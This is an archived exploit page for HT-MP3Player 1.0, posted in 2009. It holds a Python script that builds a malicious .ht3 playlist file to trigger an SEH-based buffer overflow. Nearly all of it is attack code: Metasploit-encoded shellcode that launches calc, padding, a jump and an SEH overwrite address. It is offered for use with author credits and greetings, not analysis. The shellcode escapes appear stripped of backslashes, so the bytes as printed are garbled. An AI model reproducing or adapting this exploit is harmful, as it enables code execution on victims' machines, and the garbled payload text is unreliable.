Home / os / win10

htmp3player10-overflow.txt

Posted on 30 June 2009

#usage: exploit.py print "**************************************************************************" print " HT-MP3Player 1.0 (.ht3) Universal Buffer Overflow (SEH) " print " Original author: hack4love<=(my friend) " print " Universal exploit : His0k4 " print " Tested on: Windows XP Pro SP3 (EN) " print " greetz: All friends (DZ),sec-r1z.com " print "**************************************************************************" # win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com shellcode=( "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49" "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36" "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34" "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41" "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34" "x42x50x42x30x42x50x4bx38x45x44x4ex53x4bx48x4ex47" "x45x30x4ax57x41x50x4fx4ex4bx48x4fx54x4ax31x4bx38" "x4fx55x42x32x41x30x4bx4ex49x54x4bx58x46x33x4bx48" "x41x30x50x4ex41x53x42x4cx49x39x4ex4ax46x48x42x4c" "x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e" "x46x4fx4bx43x46x45x46x32x46x30x45x47x45x4ex4bx58" "x4fx45x46x52x41x50x4bx4ex48x36x4bx48x4ex50x4bx44" "x4bx58x4fx55x4ex51x41x50x4bx4ex4bx58x4ex51x4bx48" "x41x30x4bx4ex49x48x4ex45x46x32x46x30x43x4cx41x53" "x42x4cx46x46x4bx58x42x54x42x33x45x58x42x4cx4ax57" "x4ex30x4bx58x42x34x4ex50x4bx48x42x37x4ex51x4dx4a" "x4bx48x4ax36x4ax30x4bx4ex49x30x4bx48x42x38x42x4b" "x42x30x42x30x42x30x4bx58x4ax46x4ex43x4fx55x41x43" "x48x4fx42x46x48x45x49x58x4ax4fx43x38x42x4cx4bx47" "x42x35x4ax46x42x4fx4cx38x46x30x4fx35x4ax46x4ax39" "x50x4fx4cx58x50x50x47x35x4fx4fx47x4ex43x46x41x56" "x4ex56x43x46x42x50x5a") payload = "D_Z" payload += shellcode payload += "x41"*(4100-len(shellcode)) payload += "xE9xF7xEFxFFxFF" payload += "x74xF9x42x42" payload += "x8Cx27x40x00" #p/p/r HTMP3Player.exe try: out_file = open("exploit.ht3",'w') out_file.write(payload) out_file.close() raw_input(" Exploit file created! ") except: print "Error"

 

TOP

Malware :